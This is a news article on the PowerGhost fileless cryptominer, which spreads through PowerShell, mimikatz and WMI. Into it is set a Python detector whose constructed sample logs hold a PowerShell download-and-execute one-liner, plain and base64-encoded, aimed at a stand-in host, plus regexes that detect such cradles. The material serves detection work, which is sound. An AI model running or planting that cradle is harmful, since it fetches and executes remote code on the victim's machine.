
Brace for PowerGhost cryptominer, warns Kaspersky Lab

Corporate networks are the target of a new illicit cryptocurrency mining malware that is difficult to detect and eradicate, security researchers warn

New malware that earns money for cyber criminals by hijacking computing resources to mine cryptocurrency, a practice known as cryptojacking, is spreading around the globe, starting in South America, according to security firm Kaspersky Lab.

This is the latest development in a rising trend of cyber criminals using cryptominers in targeted attacks to generate funds.

As cryptojacking grows and overtakes ransomware as cyber criminals' most popular way of raising funds, Kaspersky Lab said enterprises will be put at risk as miners sabotage and slow down their computer networks, disrupting business processes.

This latest cryptojacking malware campaign, dubbed PowerGhost, is noteworthy for businesses as it appears to be focused on corporate environments in attacks in Brazil, Colombia, India and Turkey. The malware has also been detected in low concentrations so far in the US, Canada, Western Europe and Russia.

PowerGhost also uses multiple fileless techniques to gain a foothold in corporate networks, meaning the miner never stores its body on disk, which makes it harder to detect and to remove, researchers said.

Machine infection occurs remotely through exploits or remote administration tools, said Kaspersky Lab researchers. When the machine is infected, the main body of the cryptominer is downloaded and run without being stored on the hard disk.

“During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” the researchers said in a blog post.

Once this has happened, cyber criminals can arrange for the miner to automatically update, spread within the network, and launch the cryptomining process.

Researchers said the miner uses mimikatz to obtain user account credentials from the current machine, logs on with them, and attempts to propagate across the local network by launching the same one-line script, which downloads the miner's body, on other hosts via WMI (Windows Management Instrumentation).
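To make the chain described above concrete for a detection team, here is an added example, written for this page and not code from Kaspersky Lab or from the article: a small Python detector run over constructed process-creation records (simplified Sysmon Event ID 1 / Security 4688 shape). It flags the three behaviours the researchers describe: a PowerShell download-and-execute one-liner, the same cradle hidden behind -EncodedCommand, and PowerShell spawned by the WMI provider host (WmiPrvSE.exe) on a target machine. The host names, URL, parent processes and event fields are constructed, and the regular expressions are generic cradle patterns, not PowerGhost indicators of compromise.

```python
"""Flag fileless PowerShell download cradles and WMI-launched PowerShell in
process-creation telemetry. Added example; the sample events are constructed."""
import base64
import binascii
import re

# A download primitive plus an in-memory invoke is the classic "download and run
# without touching disk" cradle (generic patterns, not PowerGhost IOCs).
DOWNLOAD_RE = re.compile(
    r"New-Object\s+(?:System\.)?Net\.WebClient|DownloadString|DownloadFile"
    r"|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I)
INVOKE_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
# -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob (UTF-16LE script).
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{24,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:i[a-z]*)?\s+hidden", re.I)


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        text = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    # A real encoded script decodes to printable text; a stray base64-looking
    # token such as "SilentlyContinue" does not.
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text


def analyse_event(event):
    """Return the list of signals found in one process-creation event."""
    findings = []
    cmd = event.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded_command")
        cmd = cmd + " " + decoded          # scan the decoded payload as well
    if DOWNLOAD_RE.search(cmd) and INVOKE_RE.search(cmd):
        findings.append("download_and_invoke")
    if HIDDEN_RE.search(cmd):
        findings.append("hidden_window")
    image = event.get("image", "").lower()
    parent = event.get("parent_image", "").lower()
    # Remote execution through WMI lands as a child of the WMI provider host.
    if image.endswith(("powershell.exe", "pwsh.exe")) and parent.endswith("wmiprvse.exe"):
        findings.append("powershell_spawned_by_wmi")
    return findings


def severity(findings):
    """The in-memory cradle is the fileless behaviour itself; the rest is context."""
    if "download_and_invoke" in findings:
        return "high"
    return "medium" if findings else "none"


def scan_events(events):
    """Return (host, severity, findings) for every event that raised a signal."""
    hits = []
    for ev in events:
        f = analyse_event(ev)
        if f:
            hits.append((ev["host"], severity(f), f))
    return hits


# Constructed records in simplified Sysmon EID 1 / Security 4688 shape.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws-017", "image": PS, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "powershell.exe -NoP -W Hidden -c " + CRADLE},   # lateral hop via WMI
    {"host": "ws-018", "image": PS, "parent_image": r"C:\Tools\RemoteAdmin\ragent.exe",
     "command_line": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED},
    {"host": "ws-019", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"host": "srv-02", "image": PS, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"powershell.exe -File C:\Monitoring\collect.ps1"},  # legitimate WMI job
]

if __name__ == "__main__":
    for host, sev, findings in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {sev} {findings}")
```

In production the same logic runs over Sysmon Event ID 1 or Security 4688 records with command-line auditing enabled; PowerShell script block logging (Event ID 4104) is worth collecting alongside, because it records the script after decoding and so catches cradles that are obfuscated beyond a plain -EncodedCommand. PowerShell launched by WmiPrvSE.exe is scored medium on its own because management tooling does this legitimately; it becomes a strong signal only in combination with the cradle.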

“PowerGhost raises new concerns about cryptomining software as threat actors turn their attention to enterprises,” said David Emm, principal security researcher at Kaspersky Lab.

“Illicit cryptocurrency mining is set to become a huge threat to the business community.”

To reduce the risk of infection with cryptominers, enterprises are advised to:

  • Always keep software updated on all devices.
  • Use tools that can automatically detect vulnerabilities to ensure security updates are applied.
  • Consider less obvious targets, such as queue management systems, POS terminals and even vending machines because such equipment can also be hijacked to mine cryptocurrency.
  • Use a dedicated security solution with application control, behaviour detection and exploit prevention components that monitor suspicious application activity and block the execution of malicious files.
  • Protect the corporate environment, educate employees and IT teams, keep sensitive data separate, and restrict access.
